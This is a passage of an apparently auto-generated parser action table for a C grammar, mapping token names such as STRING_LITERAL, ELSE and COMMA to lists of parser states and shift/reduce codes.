,[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,190,190,-309,190,-309,-28,-294,190,-167,-308,190,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,190,190,190,190,-257,307,-259,190,190,190,-238,190,-266,-267,-268,-265,-271,-269,-270,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,190,-309,-28,-266,190,190,190,190,190,-202,-201,190,-257,190,190,-218,190,190,190,190,190,-80,190,-214,-215,-217,190,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,190,-279,-280,-260,190,-261,-262,-263,190,-304,-306,-11,190,-12,190,-266,190,190,-309,-266,190,190,-203,190,-205,190,-287,-79,190,-213,-216,-239,-240,-241,-242,-243,307,307,307,307,307,307,307,307,307,307,307,307,307,-274,-275,-276,-277,-278,-309,-182,190,-309,-28,-266,-204,190,190,-309,-258,190,190,190,190,190,-272,-273,190,-264,190,-11,-266,190,190,-206,-80,-208,-209,190,190,-281,-309,190,-288,190,-207,-282,-210,190,190,-212,-211,]),'NOT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,193,193,-309,193,-309,-28,193,-167,-308,193,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,193,193,193,193,193,193,193,193,-266,-267,-268,-265,-269,-270,-309,193,-309,-28,-266,193,193,193,193,193,-202,-201,193,193,193,-218,193,193,193,193,193,-80,193,-214,-215,-217,193,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,193,-11,193,-12,193,-266,193,193,-309,-266,193,193,-203,193,-205,193,-79,193,-213,-216,-309,-182,193,-309,-28,-266,-204,193,193,-309,193,193,193,193,193,193,193,-11,-266,193,193,-206,-80,-208,-209,193,193,-309,193,193,-207,-210,193,193,-212,-211,]),'LNOT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,194,194,-309,194,-309,-28,194,-167,-308,194,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,194,194,194,194,194,194,194,194,-266,-267,-268,-265,-269,-270,-309,194,-309,-28,-266,194,194,194,194,194,-202,-201,194,194,194,-218,194,194,194,194,194,-80,194,-214,-215,-217,194,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,194,-11,194,-12,194,-266,194,194,-309,-266,194,194,-203,194,-205,194,-79,194,-213,-216,-309,-182,194,-309,-28,-266,-204,194,194,-309,194,194,194,194,194,194,194,-11,-266,194,194,-206,-80,-208,-209,194,194,-309,194,194,-207,-210,194,194,-212,-211,]),'OFFSETOF':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,199,199,-309,199,-309,-28,199,-167,-308,199,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,199,199,199,199,199,199,199,199,-266,-267,-268,-265,-269,-270,-309,199,-309,-28,-266,199,199,199,199,199,-202,-201,199,199,199,-218,199,199,199,199,199,-80,199,-214,-215,-217,199,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,199,-11,199,-12,199,-266,199,199,-309,-266,199,199,-203,199,-205,199,-79,199,-213,-216,-309,-182,199,-309,-28,-266,-204,199,199,-309,199,199,199,199,199,199,199,-11,-266,199,199,-206,-80,-208,-209,199,199,-309,199,199,-207,-210,199,199,-212,-211,]),'INT_CONST_DEC':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,200,200,-309,200,-309,-28,200,-167,-308,200,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,200,200,200,200,200,200,200,200,-266,-267,-268,-265,-269,-270,-309,200,-309,-28,-266,200,200,200,200,200,-202,-201,200,200,200,-218,200,200,200,200,200,-80,200,-214,-215,-217,200,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,200,-11,200,-12,200,-266,200,200,-309,-266,200,200,-203,200,-205,200,-79,200,-213,-216,-309,-182,200,-309,-28,-266,-204,200,200,-309,200,200,200,200,200,200,200,-11,-266,200,200,-206,-80,-208,-209,200,200,-309,200,200,-207,-210,200,200,-212,-211,]),'INT_CONST_OCT':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,201,201,-309,201,-309,-28,201,-167,-308,201,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,201,201,201,201,201,201,201,201,-266,-267,-268,-265,-269,-270,-309,201,-309,-28,-266,201,201,201,201,201,-202,-201,201,201,201,-218,201,201,201,201,201,-80,201,-214,-215,-217,201,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,201,-11,201,-12,201,-266,201,201,-309,-266,201,201,-203,201,-205,201,-79,201,-213,-216,-309,-182,201,-309,-28,-266,-204,201,201,-309,201,201,201,201,201,201,201,-11,-266,201,201,-206,-80,-208,-209,201,201,-309,201,201,-207,-210,201,201,-212,-211,]),'INT_CONST_HEX':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,202,202,-309,202,-309,-28,202,-167,-308,202,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,202,202,202,202,202,202,202,202,-266,-267,-268,-265,-269,-270,-309,202,-309,-28,-266,202,202,202,202,202,-202,-201,202,202,202,-218,202,202,202,202,202,-80,202,-214,-215,-217,202,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,202,-11,202,-12,202,-266,202,202,-309,-266,202,202,-203,202,-205,202,-79,202,-213,-216,-309,-182,202,-309,-28,-266,-204,202,202,-309,202,202,202,202,202,202,202,-11,-266,202,202,-206,-80,-208,-209,202,202,-309,202,202,-207,-210,202,202,-212,-211,]),'INT_CONST_BIN':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,203,203,-309,203,-309,-28,203,-167,-308,203,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,203,203,203,203,203,203,203,203,-266,-267,-268,-265,-269,-270,-309,203,-309,-28,-266,203,203,203,203,203,-202,-201,203,203,203,-218,203,203,203,203,203,-80,203,-214,-215,-217,203,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,203,-11,203,-12,203,-266,203,203,-309,-266,203,203,-203,203,-205,203,-79,203,-213,-216,-309,-182,203,-309,-28,-266,-204,203,203,-309,203,203,203,203,203,203,203,-11,-266,203,203,-206,-80,-208,-209,203,203,-309,203,203,-207,-210,203,203,-212,-211,]),'FLOAT_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,204,204,-309,204,-309,-28,204,-167,-308,204,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,204,204,204,204,204,204,204,204,-266,-267,-268,-265,-269,-270,-309,204,-309,-28,-266,204,204,204,204,204,-202,-201,204,204,204,-218,204,204,204,204,204,-80,204,-214,-215,-217,204,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,204,-11,204,-12,204,-266,204,204,-309,-266,204,204,-203,204,-205,204,-79,204,-213,-216,-309,-182,204,-309,-28,-266,-204,204,204,-309,204,204,204,204,204,204,204,-11,-266,204,204,-206,-80,-208,-209,204,204,-309,204,204,-207,-210,204,204,-212,-211,]),'HEX_FLOAT_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,205,205,-309,205,-309,-28,205,-167,-308,205,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,205,205,205,205,205,205,205,205,-266,-267,-268,-265,-269,-270,-309,205,-309,-28,-266,205,205,205,205,205,-202,-201,205,205,205,-218,205,205,205,205,205,-80,205,-214,-215,-217,205,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,205,-11,205,-12,205,-266,205,205,-309,-266,205,205,-203,205,-205,205,-79,205,-213,-216,-309,-182,205,-309,-28,-266,-204,205,205,-309,205,205,205,205,205,205,205,-11,-266,205,205,-206,-80,-208,-209,205,205,-309,205,205,-207,-210,205,205,-212,-211,]),'CHAR_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,206,206,-309,206,-309,-28,206,-167,-308,206,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,206,206,206,206,206,206,206,206,-266,-267,-268,-265,-269,-270,-309,206,-309,-28,-266,206,206,206,206,206,-202,-201,206,206,206,-218,206,206,206,206,206,-80,206,-214,-215,-217,206,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,206,-11,206,-12,206,-266,206,206,-309,-266,206,206,-203,206,-205,206,-79,206,-213,-216,-309,-182,206,-309,-28,-266,-204,206,206,-309,206,206,206,206,206,206,206,-11,-266,206,206,-206,-80,-208,-209,206,206,-309,206,206,-207,-210,206,206,-212,-211,]),'WCHAR_CONST':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,207,207,-309,207,-309,-28,207,-167,-308,207,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,207,207,207,207,207,207,207,207,-266,-267,-268,-265,-269,-270,-309,207,-309,-28,-266,207,207,207,207,207,-202,-201,207,207,207,-218,207,207,207,207,207,-80,207,-214,-215,-217,207,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,207,-11,207,-12,207,-266,207,207,-309,-266,207,207,-203,207,-205,207,-79,207,-213,-216,-309,-182,207,-309,-28,-266,-204,207,207,-309,207,207,207,207,207,207,207,-11,-266,207,207,-206,-80,-208,-209,207,207,-309,207,207,-207,-210,207,207,-212,-211,]),'STRING_LITERAL':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,197,208,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,333,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,208,208,-309,208,-309,-28,208,-167,-308,208,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,208,208,208,208,208,208,208,208,-266,-267,-268,-265,-269,-270,333,-303,-309,208,-309,-28,-266,208,208,208,208,208,-202,-201,208,208,208,-218,208,208,208,208,208,-80,208,-214,-215,-217,208,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,208,-304,-11,208,-12,208,-266,208,208,-309,-266,208,208,-203,208,-205,208,-79,208,-213,-216,-309,-182,208,-309,-28,-266,-204,208,208,-309,208,208,208,208,208,208,208,-11,-266,208,208,-206,-80,-208,-209,208,208,-309,208,208,-207,-210,208,208,-212,-211,]),'WSTRING_LITERAL':([14,45,46,47,77,78,79,95,96,97,101,106,113,114,116,117,118,130,133,144,152,153,154,155,156,157,158,159,160,161,162,164,168,172,177,183,184,185,187,188,189,190,191,193,194,198,209,215,216,217,218,222,225,226,239,248,262,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,328,332,334,338,339,340,343,346,347,348,360,368,369,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,476,477,482,483,484,490,491,493,494,497,507,509,511,515,518,520,522,525,526,528,],[-68,-117,-118,-119,-83,-69,-309,-27,-28,-166,-307,209,209,-309,209,-309,-28,209,-167,-308,209,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,209,209,209,209,209,209,209,209,-266,-267,-268,-265,-269,-270,334,-305,-309,209,-309,-28,-266,209,209,209,209,209,-202,-201,209,209,209,-218,209,209,209,209,209,-80,209,-214,-215,-217,209,-224,-225,-226,-227,-228,-229,-230,-231,-232,-233,-234,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,209,-306,-11,209,-12,209,-266,209,209,-309,-266,209,209,-203,209,-205,209,-79,209,-213,-216,-309,-182,209,-309,-28,-266,-204,209,209,-309,209,209,209,209,209,209,209,-11,-266,209,209,-206,-80,-208,-209,209,209,-309,209,209,-207,-210,209,209,-212,-211,]),'ELSE':([14,78,144,156,157,158,159,160,161,162,264,273,282,283,286,287,289,381,384,395,398,399,458,490,491,493,494,518,520,526,528,],[-68,-69,-308,-72,-73,-74,-75,-76,-77,-78,-202,-218,-78,-80,-214,-215,-217,-203,-205,-79,-213,-216,-204,-206,507,-208,-209,-207,-210,-212,-211,]),'PPPRAGMASTR':([14,],[78,]),'EQUALS':([15,23,62,73,74,75,76,81,92,108,110,127,131,138,144,163,180,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,227,228,270,325,326,327,329,330,331,333,334,341,342,349,350,351,352,387,422,424,425,426,427,435,437,438,439,442,443,462,469,470,473,478,479,480,508,513,519,],[-52,-29,-162,113,-163,-54,-37,-53,130,-162,-55,-294,-30,248,-308,-294,291,-259,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,-35,-36,-257,-279,-280,-260,-261,-262,-263,-304,-306,434,-183,-43,-44,-31,-34,-287,-274,-275,-276,-277,-278,-184,-186,-39,-42,-32,-33,-258,-272,-273,-264,-185,-40,-41,-281,-288,-282,]),'COMMA':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,62,63,64,65,66,70,72,73,74,75,76,81,87,90,91,92,94,95,96,97,98,99,102,103,108,110,121,123,124,125,126,127,131,132,133,136,137,138,142,144,148,163,169,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,211,212,213,214,227,228,231,232,233,234,235,236,237,240,241,242,243,244,245,246,247,250,252,253,256,257,259,260,261,263,269,270,276,277,288,325,326,327,329,330,331,333,334,337,349,350,351,352,356,357,358,359,371,372,373,374,375,376,380,385,387,388,389,391,392,393,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,430,431,433,438,439,442,443,449,450,451,452,456,457,462,469,470,473,475,479,480,485,486,487,488,489,492,495,498,499,502,503,504,508,513,516,517,519,524,],[-52,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-162,-89,-90,-91,-92,111,-120,-122,-163,-54,-37,-53,-94,129,-124,-126,-164,-27,-28,-166,-152,-153,-132,-133,-162,-55,229,230,-170,-175,-309,-294,-30,-165,-167,247,-157,-160,-135,-308,-130,-294,278,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-121,-38,-123,-177,-35,-36,-172,-173,-174,-188,-56,-1,-2,-45,-190,-125,-127,247,247,-154,-158,-137,-139,-134,-128,-129,378,-147,-149,-131,-235,-257,278,-309,278,-279,-280,-260,-261,-262,-263,-304,-306,432,-43,-44,-31,-34,-171,-176,-57,-189,-155,-156,-159,-161,-136,-138,-151,278,-287,-187,-188,-220,278,278,-223,278,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,278,471,-274,-292,-275,-276,-277,-278,474,-178,-180,-39,-42,-32,-33,-191,-197,-193,-195,-148,-150,-258,-272,-273,-264,-179,-40,-41,-50,-51,-192,-194,-196,509,278,-237,-293,-181,-46,-49,-281,-288,-47,-48,-282,278,]),'RPAREN':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,63,64,65,66,75,76,80,81,87,93,94,95,96,97,98,99,102,103,110,112,115,119,120,121,122,123,124,125,126,127,131,132,133,142,144,148,169,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,219,220,227,228,231,232,233,234,235,236,237,238,240,241,246,250,252,253,256,257,263,266,270,275,276,277,322,325,326,327,329,330,331,333,334,349,350,351,352,355,356,357,358,359,361,362,363,364,365,366,370,371,372,375,376,383,385,387,388,389,390,391,392,393,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,421,422,423,424,425,426,427,428,429,438,439,442,443,447,448,449,450,451,452,455,462,469,470,473,479,480,485,486,487,488,489,495,497,498,499,500,501,503,504,508,511,512,513,516,517,519,521,523,527,],[-52,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-89,-90,-91,-92,-54,-37,-309,-53,-94,131,-164,-27,-28,-166,-152,-153,-132,-133,-55,212,-309,227,228,-168,-17,-18,-170,-175,-309,-294,-30,-165,-167,-135,-308,-130,-14,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,349,350,-35,-36,-172,-173,-174,-188,-56,-1,-2,-309,-45,-190,-154,-137,-139,-134,-128,-129,-131,-13,-257,386,387,-309,422,-279,-280,-260,-261,-262,-263,-304,-306,-43,-44,-31,-34,-169,-171,-176,-57,-189,-309,449,450,-188,-23,-24,-309,-155,-156,-136,-138,459,460,-287,-187,-188,-309,-220,463,464,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,470,-274,-292,-275,-276,-277,-278,472,473,-39,-42,-32,-33,485,486,-191,-197,-193,-195,489,-258,-272,-273,-264,-40,-41,-50,-51,-192,-194,-196,510,-309,-237,-293,513,-289,-46,-49,-281,-309,522,-288,-47,-48,-282,525,-290,-291,]),'COLON':([15,20,23,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,74,75,76,81,98,99,102,103,108,110,127,131,142,144,145,148,163,165,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,227,228,246,250,252,253,256,257,261,263,268,269,270,325,326,327,329,330,331,333,334,349,350,351,352,371,372,375,376,378,387,391,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,438,439,442,443,462,469,470,473,479,480,498,508,513,519,],[-52,-116,-29,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-163,-54,-37,-53,-152,-153,-132,-133,-162,-55,-294,-30,-135,-308,262,-130,267,272,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,-35,-36,-154,-137,-139,-134,-128,-129,379,-131,382,-235,-257,-279,-280,-260,-261,-262,-263,-304,-306,-43,-44,-31,-34,-155,-156,-136,-138,262,-287,-220,-223,468,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-39,-42,-32,-33,-258,-272,-273,-264,-40,-41,-237,-281,-288,-282,]),'LBRACKET':([15,20,21,23,25,26,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,63,64,65,66,75,76,81,87,94,95,96,97,98,99,101,102,103,110,126,127,131,132,133,142,144,148,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,212,215,227,228,234,235,238,240,241,246,250,252,253,256,257,263,277,325,326,333,334,341,342,349,350,351,352,358,359,364,371,372,375,376,387,389,390,422,424,425,426,427,432,435,437,438,439,442,443,449,450,451,452,461,469,470,478,479,480,485,486,487,488,489,500,501,503,504,508,509,513,516,517,519,523,527,],[79,-116,-93,-29,-97,-309,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-89,-90,-91,-92,114,-37,79,-94,-164,-27,-28,-166,-152,-153,-307,-132,-133,114,239,-294,-30,-165,-167,-135,-308,-130,-294,321,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-38,343,-35,-36,239,360,239,-45,369,-154,-137,-139,-134,-128,-129,-131,239,-279,-280,-304,-306,343,-183,-43,-44,-31,-34,360,369,239,-155,-156,-136,-138,-287,239,239,-274,-275,-276,-277,-278,343,-184,-186,-39,-42,-32,-33,-191,-197,-193,-195,343,-272,-273,-185,-40,-41,-50,-51,-192,-194,-196,515,-289,-46,-49,-281,343,-288,-47,-48,-282,-290,-291,]),'RBRACKET':([45,46,47,79,95,97,114,116,118,127,133,144,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,216,218,221,222,223,224,239,269,270,325,326,327,329,330,331,333,334,345,346,353,354,360,367,368,369,387,391,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,422,424,425,426,427,436,440,441,444,446,453,454,462,469,470,473,481,482,498,505,506,508,513,519,524,],[-117,-118,-119,-309,-27,-166,-309,-309,-28,-294,-167,-308,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-309,-28,351,352,-3,-4,-309,-235,-257,-279,-280,-260,-261,-262,-263,-304,-306,438,439,442,443,-309,451,452,-309,-287,-220,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,469,-274,-275,-276,-277,-278,478,479,480,-309,-28,487,488,-258,-272,-273,-264,503,504,-237,516,517,-281,-288,-282,527,]),'PERIOD':([101,127,144,163,182,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,215,325,326,333,334,341,3